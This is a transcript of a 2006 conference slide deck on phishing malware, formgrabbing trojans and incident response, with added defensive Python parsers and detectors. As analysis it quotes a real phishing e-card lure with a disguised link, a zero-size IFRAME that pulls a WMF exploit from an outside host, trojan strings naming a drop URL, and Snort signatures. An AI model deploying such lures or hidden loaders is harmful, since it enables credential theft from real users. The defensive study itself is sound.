Page 1
For Distribution. Copyright 2006 Secure Science Corp.

Trojans & Botnets & Malware, Oh My!

Shmoocon '06
Lance James
Secure Science Corporation

Page 2

What is this talk about?
Malware, in regards to incident response
Pre-emptive techniques
Research & development
Related mainly to theft-intended malware

What is Malware?
Malicious software/hardware
Designed to be harmful

Page 3

Cyber Attack Sophistication Continues To Evolve
[Figure: CERT chart of attack sophistication against intruder knowledge (high to low), 1980 through 2000+, with "Tools" and "Attackers" as the two plotted series. Technique labels recovered from the chart (order not recoverable): password guessing, self-replicating code, password cracking, exploiting known vulnerabilities, disabling audits, back doors, hijacking sessions, sweepers, sniffers, packet spoofing, GUI, automated probes/scans, denial of service, www attacks, "stealth"/advanced scanning techniques, burglaries, network mgmt. diagnostics, distributed attack tools, cross site scripting, staged attack, bots. Source: CERT]

Page 4

And Continue To Grow...
Data theft grew more than 650% over the past 3 years (CSI/FBI)
137,000 security incidents in 2003, nearly twice as many as in 2002 (CERT)
Avg reported loss from attacks was $2.7M per incident (CSI/FBI survey)
85% of respondents had breaches (CSI/FBI survey)
85% of the critical infrastructure is owned or operated by the private sector
Source: Carnegie Mellon

Page 5

Growth Or Liability?
Over twenty per cent of Internet users now access online banking services.
This total will reach 33% by 2006, according to The Online Banking Report.
By 2010, over 55 million US households will use online banking and ePayments services, which are tipped as "growth areas".
Wamu buys Providian, BofA buys MBNA
And so what about the 'Phishing' threat to e-commerce?
Source: ePaynews

Page 6

What Is Phishing?
Phishing, also referred to as brand spoofing, is a variation on "fishing," the idea being that bait is thrown out with the hope that while most will ignore the bait, some will be tempted into biting.
Phishing is the act of sending a communication to a user falsely claiming to be an established legitimate enterprise in an attempt to scam the user into surrendering private information that will be used for identity theft.
The communication (usually email) directs the user to visit a Web site where they are asked to update personal information, such as passwords and credit card, social security, and bank account numbers, that the legitimate organization already has.
The Web site, however, is bogus or hostile and set up only to steal the user's information.

Page 7

What's Worse? Email Phish or Phishing Malware?
Some of the larger phishing groups have associations with both phishing emails and key-logging malware.
While phishing email is very effective, the number of victims is significantly smaller than the victims of phishing malware.
Logs recovered from base camps for phishing emails and malware show a startling difference.

Page 8

Email vs Malware

Volume of data generated
  Phishing emails: Each victim = < 500 bytes of data. 1 week = < 50 Kbytes. A single person can process the data in minutes.
  Phishing malware / keyloggers: A single key logging Trojan can generate hundreds of megabytes of data in a week. The data is not processed by hand. Instead, scripts are used to filter the information. Potentially valuable information is frequently ignored due to the filtering process.

Type of information compromised
  Phishing emails: Account login, or credit card number with expiration and address. Generally, a single victim only loses a single amount of information. Few victims lose more than one type of information. And the information compromised may not match the information desired by the phisher.
  Phishing malware / keyloggers: Name, address, phone, SSN, credit card, VCC2, bank account numbers, logins and passwords, and even items such as mother's maiden name or the answer to the "forgot your password" prompt. Generally, victims provide all of the information asked.

Average number of accounts compromised in a week
  Phishing emails: 100
  Phishing malware / keyloggers: 500,000

Page 9

Email vs Malware (cont.)

Total development cost to the phishers?
  Phishing emails: A single phishing server may take one week to develop. The server may then be applied to hundreds of blind drop servers and reused for weeks or longer. Changes to the phishing email content (bait) can be measured in hours and may not need a change to the phishing server.
  Phishing malware / keyloggers: A single malware system, including Trojan and receiving server, may take months to develop. Each variant may take a week or longer to develop. When generic anti-virus signatures appear, redevelopment may take weeks or months.

How often is the method viable?
  Phishing emails: Reused regularly for weeks or months before requiring a change. Due to simple changes in the mailing list, a variety of people can be solicited; information is almost never collected from the same person twice.
  Phishing malware / keyloggers: Most malware is effective for a week before anti-virus vendors develop signatures. Some phishing groups use malware in limited distributions. While these programs may exist for much longer durations, they generally collect less information. A single person that is infected may compromise the same information multiple times.

Page 10

Phishing Malware (cont.)
In November of 2003, the concept of a single mega-virus changed.
Gaobot, followed by Sasser and Berbew, took a different tack: rather than one mega-worm, these consisted of hundreds of variants, each slightly different.
The goal of the variant was not to become a mega-worm, but rather to infect a small group of systems.

Page 11

Phishing Malware (cont.)
This approach provided two key benefits to the malware authors:
Limited distribution; limited detection. As long as the malware is not widespread, the anti-virus vendors would be less likely to detect the malware. (If Norton doesn't know about a virus, then they cannot create a detection signature for the virus.)
  Over the last 12 months Secure Science Corporation has identified dozens of virus variants used by phishers, carders, and generic malware authors that are not detected by anti-virus software.
Rapid deployment. Nearly a hundred variants of Sasser were identified in less than three months. Each variant requires a different detection signature. The rapid modification and deployment ensures that anti-virus vendors will overtax their available resources, becoming less responsive to new strains. It also ensures that some variants will not be detected.

Page 12

Phishing Malware (cont.)
We're seeing a significant increase in malware used by phishing groups.
  IE exploitation via ActiveX blended threats
Let's take a closer look at the malware, and the threat model behind phishers and their malware.
Malware key-logging myths

Page 13

Phishing Malware (cont.)
A few phishing groups have been associated with specific malware.
The malware is used for a variety of purposes:
  Compromising hosts for operating the phishing server;
  Compromising hosts for relaying the bulk mailing;
  Directly attacking clients with key-logging software.
A single piece of malware may serve any or all of these purposes.

Page 14

Malware Trends
In early 2004, the malware associated with phishing groups rarely appeared to be created specifically for phishing. Instead, it was focused on botnet* attributes:
Email relay. The software opens network services that can be used to relay email anonymously. This is valuable to phishers, and spammers in general.
Data mining. The malware frequently contains built-in functions for gathering information from the local system. The gathering usually focuses on software licenses (for game players, warez, or serialz dealers**) and Internet Explorer cache. The latter may contain information such as logins. For phishers, this type of data mining primarily focuses on account logins to phishing targets.

* A compromised system with remote control capabilities is a "bot". A "botnet" is a collection of these compromised hosts.
** Illegally distributed software applications (warez) and the associated license keys (serialz) are frequently available and propagated through the underground software community.

Page 15

Malware Trends (cont.)
Remote control. The malware usually has backdoor capabilities. This permits a remote user to control and access the compromised host. For a phisher, there is little advantage to having a backdoor to a system unless they plan to use the server for hosting a phishing site. But for other people, such as virus writers or botnet farmers*, remote control is an essential attribute.

* A "botnet farmer" is an individual or group that manages and maintains one or more botnets. The botnet farmers generate revenue by selling systems or CPU time to other people. Essentially, the botnet becomes a large timeshare computer network.

Page 16

Malware Trends (cont.)
By Q3 of 2004, a few large phishing groups had evolved to support their own specific malware.
While the malware did contain email relays, data mining functions, and remote control services, these had been tuned to support phishing specifically.
Viruses such as W32.Spybot.Worm included specific code to harvest bank information from compromised hosts.

Page 17

Malware Trends (cont.)
A few phishing groups also appeared associated with key logging software.
While not true "key logging", these applications capture data submitted (posted) to web servers.
A true key logger would generate massive amounts of data, and it would be difficult for an automated system to identify account and login information.

Page 18

Malware Trends (cont.)
Instead, these applications hook into Internet Explorer's (IE) form submission system.
All data from the submitted form is relayed to a blind drop operated by the phishers.
The logs contain information about the infected system, as well as the URL and submitted form values.
More importantly, the malware intercepts the data before it enters any secure network tunnel, such as SSL or HTTPS.

Page 19

Malware Trends (cont.)
Examples of data output:
Recent examples of HaxDoor, Berbew and PWS.Banker reveal similar "Formgrabbing":

reason=&Access_ID=xxxxxxxx&Access_ID_1=&Current_Passcode=xxxxxxx&acct=&pswd=&from=homepage&Customer_Type=MODEL&pmbutton=false&pmloginid=&dltoken=&id=*******&state=MA&pc=*******
onlineid.bankofamerica.com/cgi-bin/sso.login.controller [11023586123662948896] [IP:xxx.xxx.xxx.xxx 13.09.2005 8:26:32]

Distributed through IE Class-ID attacks
  ADB/CHM
  IFRAME TAG
  Javaprxy???
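The record above is what a responder gets back when a blind drop is recovered: one URL-encoded form body, then the target URL, a per-infection id and an [IP: date time] stamp. The following is an added example (not code from the talk or from Secure Science) of parsing such records into something usable for victim notification: it splits the form into fields, drops credential values while recording which credential fields were captured, and counts distinct infected machines per target site. The record layout follows the slide; the hosts, ids, addresses and field values in the sample log are constructed.

```python
"""Parse formgrabber drop-log records into structured data for victim notification.

Added example, not code from the talk or from Secure Science. The record layout
(a URL-encoded form body on one line, then the target URL, a numeric bot id in
square brackets and an [IP:<addr> dd.mm.yyyy H:M:S] stamp on the next) follows
the sample shown on the slide; hosts, ids and field values below are constructed.
"""
import re
from dataclasses import dataclass
from datetime import datetime
from urllib.parse import parse_qs, urlsplit

# Form field names that carry credentials or card data. A responder needs to
# know these were captured (password reset, card reissue) but must not carry the
# values around in notification spreadsheets, so the values are dropped.
SENSITIVE_FIELD_RE = re.compile(r"pass|pswd|pin|ssn|cvv|vcc|card", re.IGNORECASE)

# Second line of a record: "<host/path> [<bot id>] [IP:<addr> <dd.mm.yyyy> <H:M:S>]"
META_RE = re.compile(
    r"^(?P<url>\S+)\s+\[(?P<bot_id>\d+)\]\s+"
    r"\[IP:(?P<ip>[^\s\]]+)\s+(?P<ts>\d{2}\.\d{2}\.\d{4} \d{1,2}:\d{2}:\d{2})\]\s*$"
)


@dataclass
class GrabRecord:
    host: str            # site the victim was logging in to
    path: str
    bot_id: str          # per-infection identifier written by the trojan
    ip: str              # victim address as logged by the drop
    timestamp: datetime
    fields: dict         # non-empty, non-sensitive submitted fields
    sensitive: list      # names of credential fields that had a value


def parse_record(text):
    """Parse one two-line record; raises ValueError on anything malformed."""
    lines = [ln for ln in text.strip().splitlines() if ln.strip()]
    if len(lines) != 2:
        raise ValueError("expected a form body line and a metadata line")
    body, meta = lines
    m = META_RE.match(meta)
    if m is None:
        raise ValueError("metadata line does not match the expected layout")
    url = m["url"]
    if "://" not in url:          # the drop logs the host without a scheme
        url = "http://" + url
    parts = urlsplit(url)
    fields, sensitive = {}, []
    # keep_blank_values=False: the grabber records every form input, most empty
    for name, values in parse_qs(body, keep_blank_values=False).items():
        if SENSITIVE_FIELD_RE.search(name):
            sensitive.append(name)
        else:
            fields[name] = values[0]
    return GrabRecord(
        host=parts.hostname,
        path=parts.path,
        bot_id=m["bot_id"],
        ip=m["ip"],
        timestamp=datetime.strptime(m["ts"], "%d.%m.%Y %H:%M:%S"),
        fields=fields,
        sensitive=sensitive,
    )


def parse_log(text):
    """Split a drop log into blank-line separated records and parse each."""
    return [parse_record(chunk) for chunk in text.strip().split("\n\n") if chunk.strip()]


def victims_per_site(records):
    """Distinct infected machines (bot ids) seen posting to each target host."""
    seen = {}
    for r in records:
        seen.setdefault(r.host, set()).add(r.bot_id)
    return {host: len(ids) for host, ids in seen.items()}


# Constructed sample log, modelled on the slide's output (placeholder hosts/ips).
SAMPLE_LOG = """
reason=&Access_ID=jdoe1234&Access_ID_1=&Current_Passcode=hunter2&acct=&pswd=&from=homepage&Customer_Type=MODEL&pmbutton=false&pmloginid=&dltoken=&id=7781&state=MA&pc=02110
onlineid.bank.example/cgi-bin/sso.login.controller [11023586123662948896] [IP:192.0.2.10 13.09.2005 8:26:32]

user=alice&password=s3cret&remember=on
www.bank.example/login [11023586123662948896] [IP:192.0.2.10 13.09.2005 9:01:05]

user=bob&password=pw&remember=
www.bank.example/login [55500000000000000001] [IP:198.51.100.7 14.09.2005 10:15:00]
"""

if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    for r in recs:
        print(r.timestamp, r.host, r.bot_id, "credential fields:", r.sensitive)
    print(victims_per_site(recs))
```

The per-host count is the number the slides keep coming back to (accounts compromised per week, per target), and the bot id rather than the IP is the right key for it, since the same infected machine reappears across logins and dial-up addresses change.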

Page 20

Side-Bar, Case Example
Anti-Malware Snake-Oil
  Virtual keyboards
  Key-board logging protection
  Scramble pads
  Anti-spyware desktop software
99% of information theft malware doesn't log key strokes! (it's unscalable)

Page 21

Side-Bar, Case Example (cont)

Page 22

Malware Trends (cont.)
The end of 2004 showed a significant modification to the malware used by some phishing groups.
The prior key logging systems generated gigabytes of data in a very short time. This made data mining difficult, since only a few sites were of interest to the phishers.
By the end of 2004 and into 2005, the phishers had evolved their software.
  Loggers focus on specific URLs, such as the web logins to Citibank and Bank of America.
  It is believed that this was intended to pre-filter the data collected by the malware. Rather than collecting all of the submitted data, only submitted data of interest was collected.
More importantly, multiple viruses appeared with this capability, indicating that multiple phishing groups evolved at the same time. This strongly suggests that malware developers associated with phishers are in communication or have a common influencing source.

Page 23

Malware Trends (cont.)
PG02 significant attack pattern identified
  Cpanel (WebISP in a box) exploitation
    System compromise
    Payload launch: www.site.com/images/newex.html
  Hijacks network or box for spamming
    Sending spam
      Uses DMS generation 2
      Enabling anonymity
      Uses dark IP space for forged Received header
  Object class exploits for IE
    Trojan downloader payload
    Classifies malware as "MSITS.exe" (reference to MS-ITS protocol attacks)
    Uses GPL code from www.edup.tudelft.nl/~bjwever/ (Berend-Jan Wever website)

Page 24

Malware Trends (cont.)
Object class attacks not "brand new"
  Uses older ADB exploit even though newer attacks exist
  January-February 2005 Haxdoor variants existed for Win98
    Suggests targeting "end of life" product
    Win98 EOL on security upgrades
    No education on phishing
    No SP2, no built-in pop-up blockers
Evolutionary pattern
  Suggests path of least resistance
  Evolve when necessary
  Win98 is plentiful and best target! Why move??

Page 25

Latest Threats
WMF exploit
  Discovered by Dan Hubbard (WebSense)
  Found in the wild as a 0-day
  Phishers were using it from Day 0
  It was supposed to be patched in November (MS05-053)
Nuclear Grabber used by Phishing Group #02
  Written by Corpse (author of A-311 Death and Nuclear Grabber)
  AV vendors call it Haxdoor
  Sells software on Corpsespyware.net from $250.00 to $2500.00
  Russian sales only

Page 26

Phishing Trends (cont.)
Serial pattern for process of Haxdoor
  Successor to Berbew malware from 2004
  Very likely relation to original Berbew authors
  '05 Berbew marked with Corpse's signature
  Haxdoor malware written in Assembly
  Trojan creation kit
    Compiles with permutations
    Packed with FSG
    Easy for phishers to compile on the fly with customized settings.

Page 27

Latest Threats

Page 28

Latest Threats
Email from Phishing Group for WMF exploit

Dear Friend,

Friends [ fromfriends at aol.com ] has sent you an e-card from <A href="http://123Greetings.com">123Greetings.com</A> .

<A href="http://123Greetings.com">123Greetings.com</A> is all about touching lives, bridging distances, healing rifts and building bonds. We have a gallery of e-cards for almost every occasion of life. Express yourself to your friends and family by sending Free e-cards from our site with your choice of colors, words and music.

Your e-card will be available with us for the next 30 days. If you wish to keep the e-card longer, you may save it on your computer or take a print.

To view your e-card, choose from any of the following options:

<a href=http://www.123greetings.com/NY2006z3 target=_blank><table><tr><td><a href="http://mujergorda.bitacoras.com/base/index.html">http://www.123greetings.com/NY2006z3</td></tr></table></a>

Page 29

Identify the Threat, Label it - Here's their analysis
What AV does with this?

Page 30

Problem?
Problem exists here
  Labeled low threat based on AV metrics
  Shoved in with the rest of the Trojan.small.em
  No known resolve other than desktop prevention
  Very reactive (as we all know)
  Evolving malware disables AV (common knowledge)
How do we change this?
  Change the AV metric
  Use common sense
  Proactive, not reactive
  Serial pattern analysis w/ common sense is key

Page 31

Incident Response
Emerging Threats
Management by Objective
Per incident basis
Threat modelling necessary (but usually never happens)
Malware author grouping
Serial Pattern
Pre-emptive Signatures
Forces them to evolve (ROI lowers)
Possible Apprehension

Page 32

R&D + IR = Proactive
Research for Haxdoor

<IFRAME src="http://imkportedoor.com/images/ny.wmf" frameborder=0 vspace=0 hspace=0 marginwidth=0 marginheight=0 width=0 height=0 scrolling=no> </IFRAME>

Grabs msits.exe from www.site.com/images/msits.exe
Packed with FSG (marked with Corpse Signature within Packing)

003C1BD1 PUSH ies4dll.003C1165 ASCII www.pcpeek-webcam-sex.com

003C1BE0 PUSH ies4dll.003C11C9 ASCII "images/data.php"

Blind drop Identified
Data recovered in realtime

Phishing the Phishers
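The e-card lure a few slides back and the hidden IFRAME loader on this slide share two tell-tales that a mail or web gateway can check for without any reverse engineering: an anchor whose visible text is a URL on one host while its href points at a different host, and a frame rendered at zero width or height. The Python below is an added example written for this page, not code from the talk or from Secure Science; the sample HTML is constructed to mirror the two slides, with placeholder hostnames in the reserved .test domain rather than the sites named in the deck.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample (not the real lure): a link whose visible text names one
# host while the href points at another, and a zero-size IFRAME pulling a .wmf.
# Hostnames are placeholders in the reserved .test domain.
SAMPLE_HTML = """
<p>To view your e-card, choose from any of the following options:</p>
<a href=http://www.example-greetings.test/NY2006z3 target=_blank><table><tr><td>
<a href="http://attacker-drop.test/base/index.html">http://www.example-greetings.test/NY2006z3</a>
</td></tr></table></a>
<IFRAME src="http://attacker-drop.test/images/ny.wmf" frameborder=0 vspace=0 hspace=0
 marginwidth=0 marginheight=0 width=0 height=0 scrolling=no> </IFRAME>
"""


class LureScanner(HTMLParser):
    """Flag anchors whose visible URL text disagrees with their href host, and
    iframes rendered at zero width or height."""

    def __init__(self):
        super().__init__()
        self._open_anchors = []   # stack of [href, visible_text]; lures nest <a> tags
        self.findings = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "a":
            self._open_anchors.append([attrs.get("href") or "", ""])
        elif tag == "iframe":
            self._check_iframe(attrs)

    def handle_data(self, data):
        # Text belongs to every anchor still open, so nested links are judged too.
        for anchor in self._open_anchors:
            anchor[1] += data

    def handle_endtag(self, tag):
        if tag == "a" and self._open_anchors:
            self._check_anchor(*self._open_anchors.pop())

    def close(self):
        super().close()
        while self._open_anchors:          # sloppy mail HTML often never closes <a>
            self._check_anchor(*self._open_anchors.pop())

    def _check_anchor(self, href, text):
        text = text.strip()
        if not text.lower().startswith(("http://", "https://")):
            return                         # only URL-looking link text can lie about its host
        shown = urlparse(text).hostname
        actual = urlparse(href).hostname
        if shown and actual and shown.lower() != actual.lower():
            self.findings.append(("link-host-mismatch", shown, actual))

    def _check_iframe(self, attrs):
        def dim(name):
            value = (attrs.get(name) or "").strip().lower().rstrip("px")
            return int(value) if value.isdigit() else None
        if dim("width") == 0 or dim("height") == 0:
            self.findings.append(("hidden-iframe", attrs.get("src") or ""))


def scan_html(html_text):
    """Return the list of finding tuples for one HTML document."""
    scanner = LureScanner()
    scanner.feed(html_text)
    scanner.close()
    return scanner.findings


if __name__ == "__main__":
    for finding in scan_html(SAMPLE_HTML):
        print(finding)
```

Run against the sample, scan_html returns one link-host-mismatch finding (visible www.example-greetings.test, actual attacker-drop.test) and one hidden-iframe finding for the .wmf source. Nested and unclosed anchors, which the real lure has, are handled by keeping a stack of open anchors and flushing whatever is left in close(); the check is a triage signal only, since legitimate mail also nests tables inside links.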

Page 33

Data Recovery

Page 34

Impact DOA
Blind drop log monitoring
Data returned to institution that's compromised
Real-time risk mitigation

Pre-emptive Action
What do we know?
Packed with FSG
How many non-malicious executables are packed with FSG?
Talks to /images/data.php
Some versions /images/dat7.php and /images/bsrv.php
Group titles it msits.exe and msys.exe

Bleeding-Edge Snort

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"BLEEDING-EDGE MALWARE Corpsepsyware.net - PG 02 Inbound"; flow:from_server,established; content:"|4D 5A|"; content:"|50 45 00 00 4C 01 02 00 46 53 47 21|"; distance:10; classtype:trojan-activity; reference:url,www.securityfocus.com/infocus/1745; sid:2002773; rev:2;)

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"BLEEDING-EDGE MALWARE Corpsespyware.net - PG 02 Outbound"; flow:to_server,established; content:"|4D 5A|"; content:"|50 45 00 00 4C 01 02 00 46 53 47 21|"; distance:10; classtype:trojan-activity; reference:url,www.securityfocus.com/infocus/1745; sid:2002772; rev:1;)
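The two Bleeding-Edge rules chain a content match on the MZ stub with a second match on the bytes 50 45 00 00 4C 01 02 00 46 53 47 21: PE\0\0, machine 0x014C (i386), two sections, and the ASCII tag FSG! sitting where the COFF header's TimeDateStamp normally is. distance:10 starts the second search ten bytes past the end of the first match. The Python below is an added illustration of that matching logic, not code from the talk or from Bleeding Edge: it emulates the two-content chain on a byte buffer, and adds a stricter check that follows e_lfanew at offset 0x3C to the PE header so that an MZ appearing elsewhere in the stream cannot satisfy the rule. The sample buffers are constructed, header-only byte strings, not executables.

```python
import struct

# Signature bytes taken from the two Bleeding-Edge rules on this slide.
MZ = bytes.fromhex("4D 5A")
FSG_PE_HEADER = bytes.fromhex("50 45 00 00 4C 01 02 00 46 53 47 21")  # PE\0\0, i386, 2 sections, "FSG!"
DISTANCE = 10


def snort_content_chain(payload, first, second, distance):
    """Emulate two chained Snort content matches: the search for `second`
    starts `distance` bytes after the end of the `first` match."""
    start = payload.find(first)
    if start < 0:
        return False
    return payload.find(second, start + len(first) + distance) >= 0


def matches_fsg_rule(payload):
    """The rule as written: any MZ followed (10 or more bytes later) by the FSG header bytes."""
    return snort_content_chain(payload, MZ, FSG_PE_HEADER, DISTANCE)


def pe_header_is_fsg(payload):
    """Header-aware variant: require MZ at offset 0 and follow e_lfanew (offset
    0x3C) to the PE header, so a stray MZ elsewhere in the stream cannot match."""
    if len(payload) < 0x40 or payload[:2] != MZ:
        return False
    e_lfanew = struct.unpack_from("<I", payload, 0x3C)[0]
    return payload[e_lfanew:e_lfanew + len(FSG_PE_HEADER)] == FSG_PE_HEADER


def build_sample_pe(timestamp_field):
    """Constructed header-only byte string shaped like a PE (not an executable):
    a 64-byte DOS header with e_lfanew = 0x80, padding, then a COFF header whose
    TimeDateStamp slot holds `timestamp_field`."""
    dos_header = MZ + b"\x00" * 58 + struct.pack("<I", 0x80)
    padding = b"\x00" * (0x80 - len(dos_header))
    coff = b"PE\x00\x00" + struct.pack("<HH", 0x014C, 2) + timestamp_field
    return dos_header + padding + coff + b"\x00" * 32


FSG_PACKED_SAMPLE = build_sample_pe(b"FSG!")                        # packer tag in the stamp slot
PLAIN_SAMPLE = build_sample_pe(struct.pack("<I", 0x43A0B2C1))       # an ordinary time stamp

if __name__ == "__main__":
    for name, sample in (("fsg", FSG_PACKED_SAMPLE), ("plain", PLAIN_SAMPLE)):
        print(name, matches_fsg_rule(sample), pe_header_is_fsg(sample))
```

Both checks fire on the FSG-shaped sample and stay quiet on the plain one. The rule identifies the packer, not malice, which is exactly the question the slide asks about non-malicious FSG-packed executables: treat a hit as a triage signal to pair with the other indicators listed here (the /images/data.php callback, the msits.exe and msys.exe names) rather than as a verdict on its own.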

Page 35

Outcome
Snort Sigs
Prevent a large amount of new phishing malware
Corpse has to change his method
Many other phishing malware packed same way

Problem response vs Incident Response
Look at overall problem
Example: Form Grabbing
Assume everyone is infected
How do we solve this?

Page 36

Example: Form Grabbing

Page 37

So you're not a RCE
Tricks for IR
IEHTTPHEADERS
BHO and IE hooks
Uses IE as Agent
Locate Blind Drop
Monitor and Mitigate
VMWare
Sandbox (with snapshots)
Tools like sysinternals, Ollydbg, winpooch
Joe Stewart has some new tools for sandnet
As it becomes more prevalent
More tools available for the common response team
Common sense is sometimes the best weapon

Page 38

Contact Info

Secure Science Corporation
7770 Regents Rd.
Suite 113-535
San Diego, CA. 92122-1967
(877)570-0455
http://www.securescience.net
Email: [email protected]

Lance James ~ CTO

Page 39

Questions